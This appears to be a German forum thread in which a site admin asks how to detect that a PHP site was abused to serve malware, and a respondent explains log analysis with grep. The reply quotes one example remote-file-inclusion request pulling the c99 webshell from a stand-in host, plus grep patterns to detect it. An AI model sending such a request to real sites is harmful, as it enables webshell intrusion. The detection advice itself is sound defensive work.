[bitmac]

Hallo zusammen,

kurz und knapp: Woran erkenne ich dass eine Website (in der Regel PHP) dazu missbraucht wurde z.B. Grafiken und Codes für Viren- und Spam-Mails auszuliefern?

Welches Analyse-Tool (lokal installiert, oder als Dienst auf dem Server) kann ich über die Webserver-Logs jagen um dort nach verdächtigen Einträgen zu suchen?

AWStats liefert seit kurzem ungewöhnlich hohen "nicht gesehenen Traffic". Laut Fußnote ist das Traffic der durch Robots, Trojaner, Viren und spezielle Status-Codes erzeugt wurde. Wie kann ich feststellen was die genaue Ursache dafür ist und vor allem was man dagegen tun kann?

chkrootkit liefert einen offenen Port (der des öfteren als Falschmeldung deklariert wurde). rkhunter liefert keine Auffälligkeiten.

Für ein paar nützliche Tipps wäre ich sehr dankbar.

CU BitMac.

[Kugelfisch23]

Auffällig ist etwa, wenn ein Skript mit einem Parameter aufgerufen wurde, der mit `http://` beginnt (deutet auf eine RFI hin). Ein Beispiel wäre etwa

Code:

/foo.php?bar=http://mallo.ry/c99.txt?

Allgemein ein Anzeichen für einen Angriff ist das Vorkommen von `c99.txt` (einer sehr beliebten Webshell). Injections zeigen sich oftmals durch ein Vorkommen von unerwarteten Anführungszeichen oder Apostrophen.

Zum untersuchen der Logdateien reicht `grep` meist aus.

Code:

$ grep "c99.txt" /var/log/apache2/access.log
$ grep "=http://" /var/log/apache2/access.log